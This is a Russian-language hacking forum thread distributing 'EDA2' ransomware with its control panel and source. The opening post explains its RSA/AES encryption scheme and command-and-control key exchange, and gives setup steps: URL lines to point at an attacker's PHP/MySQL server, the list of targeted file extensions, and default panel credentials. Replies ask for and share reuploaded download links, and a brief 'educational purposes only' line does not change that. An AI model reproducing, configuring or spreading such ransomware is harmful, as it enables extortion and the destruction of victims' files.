• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

EDA2 Ransomware - Panel + Source

  • Автор темы Автор темы cyber23
  • Дата начала Дата начала

cyber23

Местный

cyber23

Местный
Регистрация
3 Июл 2017
Сообщения
112
Реакции
51
Баллы
2
Особенности:
Использует алгоритмы RSA и AES.
Координаты с сервером Command & Control.
Использует CSPRNG.
Использование phplibsec.
Зашифрованные файлы могут быть дешифрованы в программе дешифрования с помощью ключа шифрования.
Изменяет фон рабочего стола.
Программа отправляет запрос POST на сервер C & C с переменными pcname и username.
Сервер C & C создает пару открытых и закрытых ключей RSA. Отправляет открытый ключ в программу, сохраняет закрытый ключ внутри базы данных Mysql.
Программа создает случайный ключ для алгоритма AES.
Программа шифрует файлы с помощью алгоритма AES.
Программа шифрует ключ AES с открытым ключом RSA и отправляет его на сервер C & C с запросом POST/
Сервер C & C сохраняет зашифрованный ключ AES внутри базы данных Mysql.
Применение:
У вас должен быть веб-сервер, на котором запущены Php и Mysql. Измените эту строку URL-адресом.

Примерно вот так:
String generatorUrl = "http://www.administration.com/panel/createkeys.php";
String keySaveUrl = "http://www.administration.com/panel/savekey.php";Ransom использует 2048 размер ключа RSA. Вы можете изменить его.
Расширения шифрования целевого файла могут быть изменены. Список по умолчанию:
Var validExtensions = new [] {".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml "," .psd "};
Измените настройки своей базы данных в db.php
Учетные данные по умолчанию для веб-панели: имя пользователя: test password: test
Вы можете использовать программу дешифрования Hidden Tear для дешифрования файлов.
Eda2 может использоваться только для образовательных целей. Не используйте его как выкуп!
| | |__ \
___ __| | __ _ ) |
/ _ \/ _` |/ _` | / /
| __/ (_| | (_| |/ /_
\___|\__,_|\__,_|____|
 

Blurryface

Пользователь
Топовый

Blurryface

Пользователь
Топовый
Регистрация
26 Мар 2017
Сообщения
3,377
Реакции
42
Баллы
2
Telegram
@Blurryface_EBF
Для чего нужен софт? Для криптации компа?
 

cyber23

Местный

cyber23

Местный
Регистрация
3 Июл 2017
Сообщения
112
Реакции
51
Баллы
2
Deymel написал(а):
Для чего нужен софт? Для криптации компа?
Что тут не понятного --вымогатель по английски (Ransomware). Неужели в описании не понятно?
 

Blurryface

Пользователь
Топовый

Blurryface

Пользователь
Топовый
Регистрация
26 Мар 2017
Сообщения
3,377
Реакции
42
Баллы
2
Telegram
@Blurryface_EBF
cyber23 написал(а):
Что тут не понятного --вымогатель по английски (Ransomware). Неужели в описании не понятно?
Ну уж извеняй, не разбираюсь в таких софтах
 

Zerppp

Пользователь
Местный

Zerppp

Пользователь
Местный
Регистрация
23 Июл 2017
Сообщения
29
Реакции
15
Баллы
2
Можешь перезалить в другое место? "В данный момент, это вложение невозможно отобразить. Пожалуйста, попробуйте позже."
 

Macbox1337

Рядовой
Местный

Macbox1337

Рядовой
Местный
Регистрация
16 Фев 2017
Сообщения
88
Реакции
11
Баллы
2
Telegram
@rektboy
Zerppp написал(а):
Можешь перезалить в другое место? "В данный момент, это вложение невозможно отобразить. Пожалуйста, попробуйте позже."
Вот , у меня остался этот софт
 

cyber23

Местный

cyber23

Местный
Регистрация
3 Июл 2017
Сообщения
112
Реакции
51
Баллы
2
Я уже отправил ему ссыль.
 
Сверху Снизу